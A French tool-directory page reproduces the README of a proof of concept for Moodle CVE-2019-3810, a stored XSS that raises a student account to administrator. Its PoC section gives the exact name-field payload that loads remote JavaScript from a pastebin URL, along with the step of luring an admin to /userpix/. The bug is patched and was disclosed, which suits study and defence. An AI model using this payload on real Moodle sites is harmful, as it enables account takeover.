Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Moodle-CVE-2019-3810 — Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) PoC XSS pour escalade de privilèges (Étudiant à Administrateur) | Kitploit
Outils/GitHubGitHub/farisv/moodle-cve-2019-3810
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubfarisv/moodle-cve-2019-3810

Moodle-CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) PoC XSS pour escalade de privilèges (Étudiant à Administrateur)

Voir le dépôt
1721il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Moodle CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) PoC XSS pour l'escalade de privilèges (Étudiant à Administrateur). C'est l'un des bugs que j'ai découverts lors d'un pentest passé dans une institution académique. Il a été suffisamment efficace à l'époque pour voler pratiquement l'accès administrateur et prendre le contrôle total de Moodle en utilisant un seul bug simple.

Nous pouvons voir d'après l'historique git que le bug existait depuis les anciennes versions de Moodle (2003) et a été corrigé en 2019.

Chronologie:

  • Décembre 2018 - Signalement du bug à Moodle
  • Janvier 2019 - Correctif publié
  • Avril 2021 - Divulgation du PoC

AVERTISSEMENT

UNIQUEMENT À DES FINS ÉDUCATIVES. N'UTILISEZ PAS L'EXPLOIT POUR DES ACTIVITÉS ILLÉGALES. L'AUTEUR N'EST PAS RESPONSABLE DE TOUTE MAUVAISE UTILISATION OU DE TOUT DOMMAGE.

PoC

  1. Téléchargez le fichier payload.js sur pastebin ou un autre service similaire. Modifiez la valeur de userid pour votre propre identifiant. Supposons que l'URL soit https://pastebin.com/raw/xxxxxxxx.
  2. Connectez-vous à votre compte étudiant.
  3. Définissez le prénom avec " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
  4. Définissez le nom de famille avec ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
  5. Demandez à l'administrateur d'ouvrir la page /userpix/ ou mettez le lien vers cette page dans votre message et attendez.

En cas de succès, votre compte sera ajouté en tant qu'administrateur.

Vidéo de démonstration

Télécharger l’outil